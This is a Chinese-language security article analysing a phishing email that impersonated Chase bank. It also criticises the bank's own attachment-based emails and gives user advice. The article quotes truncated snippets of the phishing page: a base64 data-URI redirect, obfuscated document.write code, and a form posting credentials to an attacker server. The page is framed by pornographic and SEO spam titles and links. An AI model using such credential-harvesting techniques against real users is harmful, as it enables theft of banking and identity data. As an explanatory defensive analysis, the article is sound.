成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

換個角度看看,為什么釣魚攻擊總能成功?

安全 應用安全
實際上,如果想要保護用戶不受網路釣魚攻擊的侵害,僅僅依靠提高用戶安全意識還是遠遠不夠的,這個過程中廠商也要負起一定的責任。

當我第一次收到銀行發來的“安全”郵件時,我第一反應就是這里是否有詐?因為在我看來,它實在是太像釣魚郵件了。這封躺在收件箱里的郵件來源于我銀行經理的個人郵箱地址,而非Chase銀行的官方郵箱。郵件中不僅附帶有一個HTML頁面,而且還有文字告訴我“在瀏覽器中打開這個頁面以了解如何進行下一步操作”,這一切瞬間讓我提高了警惕。

首先,本身電子郵件這個東西就是不安全的,更何況是我的銀行還發送了一封帶有附件的“安全”郵件給我。這看起來就像是一次教科書般的釣魚攻擊,所以我趕緊拿起電話直接打給了我的銀行經理。

“不是的,這是合法郵件。我需要你將它打印出來,然后簽署一些文件。”這就是銀行經理給我的回答。

但我說到:“首先,郵件發送人的地址看起來就非??梢?,而且這種郵件不僅要讓我點擊外部鏈接并打開附件,而且還要我在Web表單中填寫我的個人信息,這誰會信啊?”

銀行經理說到:“我完全理解,這確實會讓人懷疑。但這封郵件沒有任何問題,我的確發過這封郵件給你,如果需要的話我還可以再發一次。”

于是乎,他果然又發了一封給我。這封重發的郵件看起來與之前那封完全一樣,但這一次我正在與我的銀行經理通話,所以我按照要求打開了附件。郵件中有一個“點擊讀取信息”的按鈕,點擊之后將我重定向到了Chase銀行的安全郵件門戶網站。但是整個過程讓我感到非常的奇葩,我也將我擔心的地方告訴了我的銀行經理、他的上司、以及Chase的客戶支持部門。

值得一提的是,我們是不可能完完全全地對客戶的行為進行安全培訓的,而銀行所采用的交互方式與釣魚攻擊幾乎沒有區別,這就非常危險了。

[[192685]]

攻擊分析

近期,我收到了一封真正的釣魚郵件。這封郵件來自chase.online@chasee.com,它很明顯是封偽造的郵件,但如果不仔細的話還是看不出什么端倪的。這封郵件聲稱我的銀行賬號近期出現了很多錯誤操作,并且跟之前那封真實的郵件一樣,它也讓我在瀏覽器中打開附件HTML文件并按提示進行操作。

但很明顯我不會按它說的做!于是,我把HTML文件下載了下來,然后把它拖到了代碼審查窗口中。我發現,除了正常的HTML代碼之外,文件中還包含一段腳本代碼:

  1. window.location="data:text/html;base64,PCFET0NUWVBFIEhUTUwg... 

這個頁面會在地址欄中顯示一大堆Base64編碼的數據,代碼本身包含有Chase銀行官網的腳本、圖片以及指向合法頁面的鏈接,整個頁面看起來和正常的Chase銀行登錄頁面沒什么區別。但是,代碼中還包含有其他的腳本代碼(經過混淆),這些代碼會在登錄頁面中添加一個自定義的表單:

  1. document.write(unescape('%3C%66%6F%72... 

在對代碼進行了反混淆之后,我發現所有的代碼都與Chase銀行的真實登錄頁面一致,只不過表單action屬性指向的是攻擊者所控制的服務器。

  1. <form action="http://191..."class="button" method="post" name="submit"id="submit"> 

如果不知情的用戶真的在瀏覽器中打開了這個頁面,那么他們將會看到一個帶有Chase商標的頁面讓他們確認以下信息:

  • 賬號登錄信息
  • 聯系信息
  • 銀行卡信息
  • 社保號和駕駛證信息等等

上述所有的這些信息都不會提交給Chase,而是提交給了攻擊者自己的服務器。這臺由攻擊者控制的服務器在成功獲取到了這些數據之后,會將用戶重定向到Chase的在線登錄頁面,所以這會讓用戶完全無法察覺到異常。我認為,之所以用戶會這樣做,完全是因為Chase平時對用戶的“訓練”所導致的(通過郵件附件要求用戶提供身份驗證信息)。

如何保護自己

除非Chase銀行不再通過這種帶有附件HTML的郵件來要求用戶登錄并填寫自己的信息,否則廣大Chase銀行的客戶還是免不了遭受釣魚攻擊。但是,我們仍然有很多方法可以避免自己落入這種網絡釣魚陷阱之中。

[[192686]]

首先,千萬不要直接打開郵件中的附件網頁,除非你能夠百分之百確定這封郵件沒有任何問題。其次,永遠不要輕易在任何網頁中填寫自己的個人信息。第三,如果郵件要求你提供個人信息,而你也不得不這樣做的話,請直接訪問在線服務的官方網站去填寫,千萬不要圖方便直接點擊郵件中的地址。這些方法同樣適用于電話釣魚。永遠不要輕易在電話中給出自己的個人信息,除非那個電話是你打過去的。

最后,請你不要嫌麻煩,一定要將所有不正常的情況上報給自己的服務商。當你遇到了勒索郵件或有人嘗試通過電話來竊取你的信息時,請一定要即使報告。

總結

實際上,如果想要保護用戶不受網路釣魚攻擊的侵害,僅僅依靠提高用戶安全意識還是遠遠不夠的,這個過程中廠商也要負起一定的責任。所謂心中無鬼,天下無鬼。很多廠商知道這封郵件是他們自己發的,就不會太在意去證明郵件的安全性與合法性,但對于用戶來說,當他們習慣了這樣的交互方式時,也就給了釣魚攻擊者可乘之機。

責任編輯:趙寧寧 來源: 51CTO專欄
相關推薦

2017-11-20 16:17:50

智慧城市

2014-01-06 16:39:43

2022-07-29 11:06:47

架構開發

2019-07-18 00:04:31

物聯網人工智能IOT

2021-06-09 09:14:00

物聯網云計算IOT

2020-05-12 10:20:39

K8s kubernetes中間件

2020-12-02 09:47:07

DNSIP地址廣告彈窗

2022-06-06 18:25:21

數據泄露互聯網

2014-09-17 14:54:06

2012-12-05 17:24:00

2015-12-16 11:15:01

2009-01-04 09:57:24

2018-06-15 07:58:36

2021-03-19 10:11:44

釣魚郵件攻擊惡意軟件

2021-10-31 08:07:54

釣魚攻擊網絡釣魚攻擊

2021-07-09 06:00:45

網絡釣魚培訓數據泄露

2021-10-03 15:50:06

網絡釣魚病毒黑客

2019-10-23 19:42:52

5G4GVR

2016-12-13 19:47:31

大數據

2016-12-16 12:54:44

數據挖掘大數據
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 一级黄a视频 | 成人亚洲性情网站www在线观看 | 欧美日韩国产免费 | 亚洲精品视 | 黄网站涩免费蜜桃网站 | 在线观看视频中文字幕 | 天久久 | 国产精品亚洲精品日韩已方 | 成人福利 | 亚洲精品乱码久久久久久久久久 | 91精品国产综合久久久久久蜜臀 | 日韩欧美中文字幕在线观看 | 国产精品揄拍一区二区 | 久久亚洲一区二区三区四区 | 97精品国产97久久久久久免费 | 爱操影视| 国产精品高潮呻吟久久av黑人 | 中文字幕一区二区视频 | а天堂中文最新一区二区三区 | 日韩av一区二区在线观看 | 成人精品视频免费 | 久久国产欧美日韩精品 | 欧美国产日韩在线观看成人 | 涩涩视频网 | 国产91丝袜在线播放 | 久久综合九色综合欧美狠狠 | 亚洲国产网站 | 日韩一级二级片 | 成人午夜电影在线观看 | 午夜精品久久 | 日韩精品在线看 | 日韩精品成人 | 天堂综合网 | 国产9999精品 | 久久精品| 视频在线亚洲 | 国产日韩久久久久69影院 | 久久高清免费视频 | 欧美国产一区二区三区 | 九九九视频 | 日韩成人免费在线视频 |